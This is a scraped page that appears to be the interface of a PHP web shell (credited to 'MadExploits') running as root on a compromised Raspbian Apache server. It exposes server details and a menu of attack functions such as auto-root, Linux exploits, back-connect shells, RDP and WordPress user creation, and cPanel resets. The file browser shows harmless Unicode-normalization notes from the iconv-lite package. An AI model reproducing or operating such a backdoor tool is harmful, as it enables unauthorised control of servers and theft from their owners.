Linux lorencats.com 5.10.103-v7l+ #1529 SMP Tue Mar 8 12:24:00 GMT 2022 armv7l
Apache/2.4.59 (Raspbian)
: 10.0.0.29 | : 216.73.216.130
Cant Read [ /etc/named.conf ]
7.3.31-1~deb10u7
root
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
lib /
nodejs /
iconv-lite /
generation /
research /
[ HOME SHELL ]
Name
Size
Permission
Action
complex-encodings-iconv.md
5.24
KB
-rw-r--r--
gen-normalization.js
5.86
KB
-rw-r--r--
get-iconv-encodings.js
3.58
KB
-rw-r--r--
normalization.md
2.22
KB
-rw-r--r--
notes.md
3.39
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : normalization.md
Combining diacritics: * http://en.wikipedia.org/wiki/Unicode_equivalence * Canonically equivalent -> n + ◌̃ = ñ (Same display, printing, meaning) * Compatible: ligatures ff = ff (Same is some apps - sorting, indexing) * Unicode normalization - replaces equivalent sequences. * There some equivalent characters (angstrom = 00C5 and 212B) * Combining vs precomposed characters (ligatures, combining) * Typographical conventions: ① is compatible with 1 * There are 4 normal forms to compare/search for strings: * Canonical(NF)/Compatibility(NFK) equivalence (chosen semantically, canonical = strict, compatibility = relaxed) * Composed/Decomposed - doesn't matter, just choose one. * Forms are in http://www.unicode.org/Public/UCD/latest/ucd/UnicodeData.txt (http://en.wikipedia.org/wiki/Character_property_(Unicode)) * http://unicode.org/reports/tr15/ - Normalization & Equivalence. * http://www.icu-project.org/docs/papers/optimized_unicode_composition_and_decomposition.html * Algorithms: http://www.unicode.org/versions/Unicode6.3.0/ch03.pdf * TR15 Part 8: Legacy encodings - about how to convert from/to other encodings. * There's a Node.js unicode normalization library 'unorm' * http://en.wikipedia.org/wiki/Combining_diacritical_mark * If several combining codes, in canonical they should be stable sorted in order of combining class. * There's a `quick check` flags http://unicode.org/faq/normalization.html * We can check before encoding/decoding that the char is in needed form. * There's also a complex combining alg-m for Korean 'Hangul' 'Jamo', through 3 tables. * Combining diacritical: 0x300-0x36F, 0x591-0x5C7, 0x610-0x61A, 0x64B-0x065F, some others. * Encodings containing: 864, 874, 1046, 1129, 1133, 1161-1163, 1255, 1256, 1258, 8859-6, 8859-11, TCVN, MacThai (mostly TCVN, 1258, 1255) * Even for single-byte encodings I need (when there are combining chars): * Composing when decoding. * Decomposing when encoding. ================================================= SBCS fast alg-m fails (see http://www.icu-project.org/docs/papers/optimized_unicode_composition_and_decomposition.html as inspiration): * If combined char is in encoding, then un-combined is also there: * CP866: Її
Close